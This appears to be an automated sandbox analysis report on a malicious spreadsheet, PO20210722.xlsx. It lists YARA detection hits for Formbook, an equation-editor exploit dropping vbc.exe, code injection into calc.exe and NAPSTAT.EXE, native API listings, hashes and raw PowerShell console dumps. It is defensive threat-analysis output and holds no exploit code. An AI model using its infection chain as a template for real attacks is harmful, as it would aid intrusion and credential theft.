          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeJump to dropped file
          Very long command line foundShow sources
          Source: C:\Users\Public\vbc.exeProcess created: Commandline size = 4201
          Source: C:\Users\Public\vbc.exeProcess created: Commandline size = 4201
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419E00 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419E80 NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419DFB NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419E4A NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00419E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A00078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A010D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A00060 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A001D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A01148 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A007AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A01930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A00C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A01D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_009FFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00199862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00199DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00259862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020B1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020AFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0E0C6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A3D005
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A13040
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A2905A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0E2E9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AB1238
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0F3CF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A363DB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A12305
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A5A37B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A17353
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A45485
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A21489
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A2C5F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A1351F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A14680
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A1E6C1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AB2622
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A1C7BC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A9579A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A457C3
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AAF8EE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A3286D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A1C85C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A129B2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AB098E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A269FE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A95955
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AC3A83
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00ABCBA4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A9DBDA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0FBD7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A37B00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00AAFDDD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A40D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A1CD5B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A42E2F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A2EE4C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A20F3F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A3DF7C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00199862
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00191072
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00191069
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00198132
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0019AA32
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0019DA6F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00195B1F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0019DB0E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00195B22
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00192CF2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00192CEC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00259862
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00251069
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00251072
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00252CEC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00252CF2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00258132
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_02161238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C2305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C7353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0210A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020E63DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020ED005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C3040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020D905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_02162622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C4680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020CE6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0214579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020CC7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020F57C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020D1489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020F5485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020DC5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_02173A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020E7B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0216CBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0214DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020CC85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020E286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0215F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_02145955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_0216098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C29B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020D69FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020F2E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020DEE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020D0F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020EDF7C
          Source: PO20210722.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BDF5C appears 98 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BE2A8 appears 33 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0212F970 appears 71 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02103F92 appears 83 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0210373B appears 213 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A0DF5C appears 107 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A7F970 appears 81 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A53F92 appears 108 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A5373B appears 238 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A0E2A8 appears 38 times
          Source: vbc.exe.4.drStatic PE information: Number of sections : 11 > 10
          Source: obi[1].exe.4.drStatic PE information: Number of sections : 11 > 10
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/15@4/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO20210722.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE81D.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................(...............(.......#.....`I%........v.....................K,.............j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............4..j......................_.............}..v....H.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.6.............}..v....X.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.M.....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X$......0...............................................
